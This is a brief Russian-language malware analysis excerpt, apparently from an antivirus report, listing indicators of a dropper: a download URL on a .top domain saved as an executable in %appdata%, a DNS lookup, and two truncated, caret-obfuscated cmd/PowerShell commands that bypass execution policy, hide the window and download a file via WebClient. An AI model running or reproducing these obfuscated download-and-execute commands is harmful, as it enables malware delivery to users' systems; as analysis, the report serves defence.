Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WE^R^SHEll^.Ex^E^ -E^X^e^C^UTI^O^NpOLic^Y^ b^yPAS^S^ -^N^OpRO^fIl^E ^-^W^INdOWStYLe h^iD^DEn^ (NEW-Ob^JE^C^t sySTeM^.n^E^T.WEB^ClieN^t)^.^Do^wn^LOaDF^ILE^('http://doseho...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "Po^WE^R^SHEll^.Ex^E^ -E^X^e^C^UTI^O^NpOLic^Y^ b^yPAS^S^ -^N^OpRO^fIl^E ^-^W^INdOWStYLe h^iD^DEn^ (NEW-Ob^JE^C^t sySTeM^.n^E^T.WEB^ClieN^t)^.^Do^wn^LOaDF^ILE^('http://doseho...' (со скрытым окном)